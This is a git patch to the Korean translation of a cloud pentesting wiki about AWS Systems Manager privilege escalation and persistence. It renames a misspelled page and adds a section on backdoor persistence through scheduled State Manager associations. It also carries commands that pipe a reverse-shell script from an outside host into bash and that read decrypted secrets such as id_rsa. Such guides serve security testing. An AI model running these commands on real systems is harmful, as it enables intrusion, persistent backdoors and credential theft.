From e0c15b69b153f7ebadacf7453a08b9145947faa0 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 24 Jul 2025 06:56:37 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-p --- src/SUMMARY.md | 2 +- .../aws-persistence/aws-ssm-persistence.md | 27 +++++++++++++ .../aws-persistence/aws-ssm-perssitence.md | 27 ------------- .../aws-ssm-privesc.md | 34 +++++++++++----- .../README.md | 40 +++++++++++-------- 5 files changed, 76 insertions(+), 54 deletions(-) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md delete mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 582319269..f61a27c2f 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -230,7 +230,7 @@ - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) - - [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) + - [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md) - [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) - [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) - [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md new file mode 100644 index 000000000..6079c1d60 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md @@ -0,0 +1,27 @@ +# AWS - SSM 지속성 + +{{#include ../../../banners/hacktricks-training.md}} + +## SSM + +자세한 정보는 다음을 확인하세요: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +{{#endref}} + +### 지속성을 위한 ssm:CreateAssociation 사용 + +**`ssm:CreateAssociation`** 권한이 있는 공격자는 SSM에 의해 관리되는 EC2 인스턴스에서 명령을 자동으로 실행하기 위해 State Manager Association을 생성할 수 있습니다. 이러한 연관은 고정 간격으로 실행되도록 구성할 수 있어, 대화형 세션 없이 백도어와 같은 지속성에 적합합니다. +```bash +aws ssm create-association \ +--name SSM-Document-Name \ +--targets Key=InstanceIds,Values=target-instance-id \ +--parameters commands=["malicious-command"] \ +--schedule-expression "rate(30 minutes)" \ +--association-name association-name +``` +> [!NOTE] +> 이 지속성 방법은 EC2 인스턴스가 Systems Manager에 의해 관리되고, SSM 에이전트가 실행 중이며, 공격자가 연관성을 생성할 수 있는 권한이 있는 한 작동합니다. 대화형 세션이나 명시적인 ssm:SendCommand 권한이 필요하지 않습니다. **중요:** `--schedule-expression` 매개변수(예: `rate(30 minutes)`)는 AWS의 최소 간격인 30분을 준수해야 합니다. 즉시 또는 일회성 실행을 위해서는 `--schedule-expression`을 완전히 생략하십시오 — 연관성은 생성 후 한 번 실행됩니다. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md deleted file mode 100644 index d46196368..000000000 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md +++ /dev/null @@ -1,27 +0,0 @@ -# AWS - SSM Perssitence - -{{#include ../../../banners/hacktricks-training.md}} - -## SSM - -자세한 정보는 다음을 확인하세요: - -{{#ref}} -../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md -{{#endref}} - -### ssm:CreateAssociation을 사용한 지속성 - -ssm:CreateAssociation 권한이 있는 공격자는 SSM에 의해 관리되는 EC2 인스턴스에서 명령을 자동으로 실행하기 위해 State Manager Association을 생성할 수 있습니다. 이러한 연관성은 고정 간격으로 실행되도록 구성할 수 있어, 대화형 세션 없이 백도어와 같은 지속성에 적합합니다. -```bash -aws ssm create-association \ ---name SSM-Document-Name \ ---targets Key=InstanceIds,Values=target-instance-id \ ---parameters commands=["malicious-command"] \ ---schedule-expression "rate(30 minutes)" \ ---association-name association-name -``` -> [!NOTE] -> 이 지속성 방법은 EC2 인스턴스가 Systems Manager에 의해 관리되고, SSM 에이전트가 실행 중이며, 공격자가 연관성을 생성할 권한이 있는 한 작동합니다. 대화형 세션이나 명시적인 ssm:SendCommand 권한이 필요하지 않습니다. **중요:** `--schedule-expression` 매개변수(예: `rate(30 minutes)`)는 AWS의 최소 간격인 30분을 준수해야 합니다. 즉시 또는 일회성 실행을 위해서는 `--schedule-expression`을 완전히 생략하십시오 — 연관성은 생성 후 한 번 실행됩니다. - -{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md index 4c4b48f64..ece53d082 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md @@ -31,11 +31,11 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \ --document-name "AWS-RunShellScript" --output text \ --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" ``` -**잠재적 영향:** SSM 에이전트가 실행 중인 인스턴스에 연결된 EC2 IAM 역할로 직접적인 권한 상승. +**잠재적 영향:** SSM 에이전트가 실행 중인 인스턴스에 연결된 EC2 IAM 역할로 직접적인 권한 상승이 가능합니다. ### `ssm:StartSession` -**`ssm:StartSession`** 권한이 있는 공격자는 **Amazon SSM 에이전트가 실행 중인 인스턴스에서 SSH와 유사한 세션을 시작하고** 그 안에서 실행 중인 IAM 역할을 **타협할 수 있습니다.** +**`ssm:StartSession`** 권한이 있는 공격자는 **Amazon SSM 에이전트가 실행 중인 인스턴스에서 SSH와 유사한 세션을 시작할 수 있으며**, **그 안에서 실행 중인 IAM 역할을 손상시킬 수 있습니다.** ```bash # Check for configured instances aws ssm describe-instance-information @@ -51,19 +51,19 @@ aws ssm start-session --target "$INSTANCE_ID" #### ECS로의 권한 상승 -**ECS 작업**이 **`ExecuteCommand`가 활성화된 상태**에서 실행될 때, 충분한 권한을 가진 사용자는 `ecs execute-command`를 사용하여 **컨테이너 내에서 명령을 실행**할 수 있습니다.\ -[**문서**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/)에 따르면, 이는 “_exec_“ 명령을 시작하는 데 사용하는 장치와 SSM 세션 관리자와의 대상 컨테이너 간에 안전한 채널을 생성하여 수행됩니다. (이 작업을 수행하려면 SSM 세션 관리자 플러그인이 필요합니다)\ -따라서 `ssm:StartSession` 권한이 있는 사용자는 해당 옵션이 활성화된 ECS 작업 내에서 **셸을 얻을 수 있습니다**. +**ECS 작업**이 **`ExecuteCommand`가 활성화된 상태**로 실행될 때, 충분한 권한을 가진 사용자는 `ecs execute-command`를 사용하여 **컨테이너 내에서 명령을 실행**할 수 있습니다.\ +[**문서**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/)에 따르면, 이는 “_exec_“ 명령을 시작하는 데 사용하는 장치와 SSM 세션 관리자와 함께 대상 컨테이너 간에 안전한 채널을 생성하여 수행됩니다. (이 작업을 수행하려면 SSM 세션 관리자 플러그인이 필요합니다)\ +따라서 `ssm:StartSession` 권한이 있는 사용자는 해당 옵션이 활성화된 ECS 작업 내에서 **쉘을 얻을 수 있습니다**. ```bash aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` ![](<../../../images/image (185).png>) -**잠재적 영향:** `ExecuteCommand`가 활성화된 실행 중인 작업에 연결된 `ECS` IAM 역할로 직접적인 권한 상승. +**Potential Impact:** `ExecuteCommand`가 활성화된 실행 중인 작업에 연결된 `ECS` IAM 역할로 직접적인 권한 상승. ### `ssm:ResumeSession` -**`ssm:ResumeSession`** 권한이 있는 공격자는 **Amazon SSM Agent가 실행 중인 인스턴스에서 SSH와 유사한 세션을 재시작**할 수 있으며, **그 안에서 실행 중인 IAM 역할을 타격할 수 있습니다.** +**`ssm:ResumeSession`** 권한이 있는 공격자는 **연결이 끊긴** SSM 세션 상태에서 Amazon SSM Agent가 실행 중인 인스턴스에서 SSH와 유사한 세션을 재시작할 수 있으며, 그 안에서 실행 중인 IAM 역할을 **타락시킬** 수 있습니다. ```bash # Check for configured instances aws ssm describe-sessions @@ -72,7 +72,7 @@ aws ssm describe-sessions aws ssm resume-session \ --session-id Mary-Major-07a16060613c408b5 ``` -**잠재적 영향:** SSM 에이전트가 실행 중인 인스턴스에 연결된 EC2 IAM 역할로 직접적인 권한 상승이 가능합니다. +**잠재적 영향:** SSM 에이전트가 실행 중인 인스턴스에 연결된 EC2 IAM 역할로 직접 권한 상승이 가능합니다. ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`) @@ -87,7 +87,7 @@ aws ssm get-parameter --name id_rsa --with-decryption ### `ssm:ListCommands` -이 권한을 가진 공격자는 모든 **명령**을 나열할 수 있으며, 그들 안에서 **민감한 정보**를 찾을 수 있기를 바랍니다. +이 권한을 가진 공격자는 모든 **명령**을 나열할 수 있으며, 그 안에서 **민감한 정보**를 찾을 수 있기를 바랍니다. ``` aws ssm list-commands ``` @@ -95,7 +95,7 @@ aws ssm list-commands ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`) -이 권한을 가진 공격자는 전송된 모든 **명령**을 나열하고 **출력**을 읽을 수 있으며, 이를 통해 **민감한 정보**를 찾을 수 있습니다. +이 권한을 가진 공격자는 모든 **명령**을 나열하고 **출력**을 읽을 수 있으며, 이를 통해 **민감한 정보**를 찾을 수 있습니다. ```bash # You can use any of both options to get the command-id and instance id aws ssm list-commands @@ -105,6 +105,20 @@ aws ssm get-command-invocation --command-id --instance-id ``` **잠재적 영향:** 명령줄 출력에서 민감한 정보를 찾습니다. +### ssm:CreateAssociation 사용 + +**`ssm:CreateAssociation`** 권한이 있는 공격자는 SSM에 의해 관리되는 EC2 인스턴스에서 명령을 자동으로 실행하기 위해 State Manager Association을 생성할 수 있습니다. 이러한 연관성은 고정된 간격으로 실행되도록 구성할 수 있어, 대화형 세션 없이 백도어와 같은 지속성을 유지하는 데 적합합니다. +```bash +aws ssm create-association \ +--name SSM-Document-Name \ +--targets Key=InstanceIds,Values=target-instance-id \ +--parameters commands=["malicious-command"] \ +--schedule-expression "rate(30 minutes)" \ +--association-name association-name +``` +> [!NOTE] +> 이 지속성 방법은 EC2 인스턴스가 Systems Manager에 의해 관리되고, SSM 에이전트가 실행 중이며, 공격자가 연관성을 생성할 권한이 있는 한 작동합니다. 대화형 세션이나 명시적인 ssm:SendCommand 권한이 필요하지 않습니다. **중요:** `--schedule-expression` 매개변수(예: `rate(30 minutes)`)는 AWS의 최소 간격인 30분을 준수해야 합니다. 즉시 또는 일회성 실행을 위해서는 `--schedule-expression`을 완전히 생략하십시오 — 연관성은 생성 후 한 번 실행됩니다. + ### Codebuild SSM을 사용하여 빌드 중인 codebuild 프로젝트에 접근할 수도 있습니다: diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index 7d752fa98..4b0bc3826 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -4,7 +4,7 @@ ## VPC & Networking -VPC와 그 구성 요소에 대해 배우기: +VPC가 무엇인지와 그 구성 요소에 대해 알아보세요: {{#ref}} aws-vpc-and-networking-basic-information.md @@ -12,7 +12,7 @@ aws-vpc-and-networking-basic-information.md ## EC2 -Amazon EC2는 **가상 서버**를 시작하는 데 사용됩니다. **보안** 및 **네트워킹** 구성과 **스토리지** 관리를 허용합니다. Amazon EC2의 유연성은 자원을 위아래로 확장할 수 있는 능력에서 분명히 나타나며, 이는 다양한 요구 변화나 인기 급증에 효과적으로 적응합니다. 이 기능은 정확한 트래픽 예측의 필요성을 줄여줍니다. +Amazon EC2는 **가상 서버**를 시작하는 데 사용됩니다. **보안** 및 **네트워킹** 구성과 **저장소** 관리를 허용합니다. Amazon EC2의 유연성은 자원을 위아래로 확장할 수 있는 능력에서 분명히 드러나며, 이는 다양한 요구 변화나 인기 급증에 효과적으로 적응합니다. 이 기능은 정확한 트래픽 예측의 필요성을 줄여줍니다. EC2에서 열거할 흥미로운 항목들: @@ -23,15 +23,15 @@ EC2에서 열거할 흥미로운 항목들: - 네트워킹 - 네트워크 - 서브네트워크 -- 공용 IP +- 공인 IP - 열린 포트 - AWS 외부의 다른 네트워크와의 통합 연결 ### Instance Profiles -**EC2 인스턴스**에서 실행되는 애플리케이션에 권한을 부여하기 위해 **역할**을 사용하는 것은 약간의 추가 구성이 필요합니다. EC2 인스턴스에서 실행되는 애플리케이션은 가상화된 운영 체제에 의해 AWS로부터 추상화됩니다. 이러한 추가 분리로 인해, EC2 인스턴스에 AWS 역할과 관련된 권한을 할당하고 이를 애플리케이션에서 사용할 수 있도록 하려면 추가 단계가 필요합니다. +**EC2 인스턴스**에서 실행되는 애플리케이션에 권한을 부여하기 위해 **역할**을 사용하는 것은 약간의 추가 구성이 필요합니다. EC2 인스턴스에서 실행되는 애플리케이션은 가상화된 운영 체제에 의해 AWS로부터 추상화됩니다. 이러한 추가 분리로 인해 AWS 역할과 관련된 권한을 EC2 인스턴스에 할당하고 이를 애플리케이션에서 사용할 수 있도록 하려면 추가 단계가 필요합니다. -이 추가 단계는 인스턴스에 연결된 [_**인스턴스 프로필**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)의 **생성**입니다. **인스턴스 프로필은 역할을 포함하며** 인스턴스에서 실행되는 애플리케이션에 역할의 임시 자격 증명을 제공할 수 있습니다. 이러한 임시 자격 증명은 애플리케이션의 API 호출에서 자원에 접근하고 역할이 지정한 자원에만 접근을 제한하는 데 사용될 수 있습니다. **EC2 인스턴스에는 한 번에 하나의 역할만 할당될 수** 있으며, 인스턴스의 모든 애플리케이션은 동일한 역할과 권한을 공유합니다. +이 추가 단계는 인스턴스에 연결된 [_**인스턴스 프로필**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)의 **생성**입니다. **인스턴스 프로필은 역할을 포함하며** 인스턴스에서 실행되는 애플리케이션에 역할의 임시 자격 증명을 제공할 수 있습니다. 이러한 임시 자격 증명은 애플리케이션의 API 호출에서 자원에 접근하고 역할이 지정한 자원에만 접근을 제한하는 데 사용될 수 있습니다. **한 번에 하나의 역할만 EC2 인스턴스에 할당될 수 있으며**, 인스턴스의 모든 애플리케이션은 동일한 역할과 권한을 공유합니다. ### Metadata Endpoint @@ -167,7 +167,7 @@ Amazon **EBS** (Elastic Block Store) **스냅샷**은 기본적으로 AWS EBS ## SSM -**Amazon Simple Systems Manager (SSM)**은 EC2 인스턴스의 관리를 원격으로 수행하여 관리 작업을 훨씬 더 쉽게 만들어 줍니다. 이러한 인스턴스는 **SSM Agent 서비스가 실행 중이어야 하며, 이 서비스가 AWS API에서 작업을 수행하고 실행합니다**. +**Amazon Simple Systems Manager (SSM)**은 EC2 인스턴스의 플로트를 원격으로 관리하여 관리 작업을 훨씬 더 쉽게 만들어 줍니다. 이러한 인스턴스는 **SSM Agent 서비스가 실행 중이어야 하며, 이 서비스가 AWS API에서 작업을 수행하고 실행하는 역할을 합니다**. **SSM Agent**는 Systems Manager가 이러한 리소스를 업데이트, 관리 및 구성할 수 있도록 합니다. 에이전트는 **AWS Cloud의 Systems Manager 서비스로부터 요청을 처리**하고, 요청에 지정된 대로 실행합니다. @@ -188,15 +188,23 @@ ps aux | grep amazon-ssm ``` ### Privesc -다음 페이지에서 **SSM 권한을 악용하여 권한 상승하는 방법**을 확인할 수 있습니다: +다음 페이지에서 **SSM 권한을 악용하여 권한 상승**하는 방법을 확인할 수 있습니다: {{#ref}} ../../aws-privilege-escalation/aws-ssm-privesc.md {{#endref}} +### Perssistence + +다음 페이지에서 **SSM 권한을 악용하여 지속성**을 달성하는 방법을 확인할 수 있습니다: + +{{#ref}} +../../aws-persistence/aws-ssm-persistence.md +{{#endref}} + ## ELB -**Elastic Load Balancing** (ELB)는 **Amazon Web Services** (AWS) 배포를 위한 **로드 밸런싱 서비스**입니다. ELB는 자동으로 **들어오는 애플리케이션 트래픽을 분산**하고 트래픽 수요에 맞게 리소스를 확장합니다. +**Elastic Load Balancing** (ELB)는 **Amazon Web Services** (AWS) 배포를 위한 **로드 밸런싱 서비스**입니다. ELB는 자동으로 **들어오는 애플리케이션 트래픽을 분산**하고 트래픽 수요를 충족하기 위해 리소스를 확장합니다. ### Enumeration ```bash @@ -209,9 +217,9 @@ aws elbv2 describe-load-balancers aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName' aws elbv2 describe-listeners --load-balancer-arn ``` -## Launch Templates & Autoscaling Groups +## 런치 템플릿 및 오토스케일링 그룹 -### Enumeration +### 열거 ```bash # Launch templates aws ec2 describe-launch-templates @@ -228,9 +236,9 @@ aws autoscaling describe-load-balancers ``` ## Nitro -AWS Nitro는 AWS EC2 인스턴스의 기본 플랫폼을 형성하는 **혁신적인 기술** 모음입니다. Amazon에 의해 **보안, 성능 및 신뢰성**을 **향상시키기 위해** 도입된 Nitro는 맞춤형 **하드웨어 구성 요소와 경량 하이퍼바이저**를 활용합니다. 전통적인 가상화 기능의 많은 부분을 전용 하드웨어와 소프트웨어로 추상화하여 **공격 표면을 최소화**하고 자원 효율성을 개선합니다. 가상화 기능을 오프로드함으로써 Nitro는 EC2 인스턴스가 **거의 베어 메탈 성능**을 제공할 수 있게 하여, 자원 집약적인 애플리케이션에 특히 유리합니다. 또한, Nitro 보안 칩은 **하드웨어와 펌웨어의 보안**을 보장하여 그 견고한 아키텍처를 더욱 강화합니다. +AWS Nitro는 AWS EC2 인스턴스의 기본 플랫폼을 형성하는 **혁신적인 기술** 모음입니다. Amazon에 의해 **보안, 성능 및 신뢰성**을 향상시키기 위해 도입된 Nitro는 맞춤형 **하드웨어 구성 요소와 경량 하이퍼바이저**를 활용합니다. 전통적인 가상화 기능의 많은 부분을 전용 하드웨어와 소프트웨어로 추상화하여 **공격 표면을 최소화**하고 자원 효율성을 개선합니다. 가상화 기능을 오프로드함으로써 Nitro는 EC2 인스턴스가 **거의 베어 메탈 성능**을 제공할 수 있게 하여 자원 집약적인 애플리케이션에 특히 유리합니다. 또한, Nitro 보안 칩은 **하드웨어와 펌웨어의 보안**을 보장하여 그 강력한 아키텍처를 더욱 강화합니다. -자세한 정보와 이를 열거하는 방법은 다음에서 확인하세요: +자세한 정보와 이를 열거하는 방법은 다음에서 확인할 수 있습니다: {{#ref}} aws-nitro-enum.md @@ -238,17 +246,17 @@ aws-nitro-enum.md ## VPN -VPN은 **온프레미스 네트워크(사이트 간 VPN)** 또는 **작업자 노트북(클라이언트 VPN)**을 **AWS VPC**와 연결하여 서비스를 인터넷에 노출하지 않고도 접근할 수 있게 합니다. +VPN은 **AWS VPC**와 **온프레미스 네트워크(사이트 간 VPN)** 또는 **작업자 노트북(클라이언트 VPN)**을 연결하여 서비스를 인터넷에 노출하지 않고도 접근할 수 있게 합니다. #### 기본 AWS VPN 구성 요소 1. **고객 게이트웨이**: - 고객 게이트웨이는 VPN 연결의 귀하 측을 나타내기 위해 AWS에서 생성하는 리소스입니다. - 본질적으로 사이트 간 VPN 연결의 귀하 측에 있는 물리적 장치 또는 소프트웨어 애플리케이션입니다. -- 고객 게이트웨이를 생성하기 위해 라우팅 정보와 네트워크 장치(예: 라우터 또는 방화벽)의 공용 IP 주소를 AWS에 제공합니다. +- 고객 게이트웨이를 생성하기 위해 AWS에 라우팅 정보와 네트워크 장치(예: 라우터 또는 방화벽)의 공용 IP 주소를 제공합니다. - VPN 연결 설정을 위한 참조 지점 역할을 하며 추가 요금이 발생하지 않습니다. 2. **가상 사설 게이트웨이**: -- 가상 사설 게이트웨이(VPG)는 사이트 간 VPN 연결의 Amazon 측에 있는 VPN 집중기입니다. +- 가상 사설 게이트웨이(VPG)는 사이트 간 VPN 연결의 Amazon 측 VPN 집중기입니다. - 귀하의 VPC에 연결되어 있으며 VPN 연결의 대상 역할을 합니다. - VPG는 VPN 연결의 AWS 측 엔드포인트입니다. - 귀하의 VPC와 온프레미스 네트워크 간의 안전한 통신을 처리합니다. @@ -259,7 +267,7 @@ VPN은 **온프레미스 네트워크(사이트 간 VPN)** 또는 **작업자 - 일반적으로 정기적이고 장기적인 연결에 사용되며 연결을 통해 전송된 데이터 양에 따라 요금이 청구됩니다. 4. **클라이언트 VPN 엔드포인트**: - 클라이언트 VPN 엔드포인트는 클라이언트 VPN 세션을 활성화하고 관리하기 위해 AWS에서 생성하는 리소스입니다. -- 개별 장치(노트북, 스마트폰 등)가 AWS 리소스 또는 온프레미스 네트워크에 안전하게 연결할 수 있도록 하는 데 사용됩니다. +- 개별 장치(노트북, 스마트폰 등)가 AWS 리소스 또는 온프레미스 네트워크에 안전하게 연결할 수 있도록 허용하는 데 사용됩니다. - 전체 네트워크를 연결하는 것이 아니라 개별 클라이언트를 위해 설계되었다는 점에서 사이트 간 VPN과 다릅니다. - 클라이언트 VPN을 사용하면 각 클라이언트 장치가 VPN 클라이언트 소프트웨어를 사용하여 안전한 연결을 설정합니다.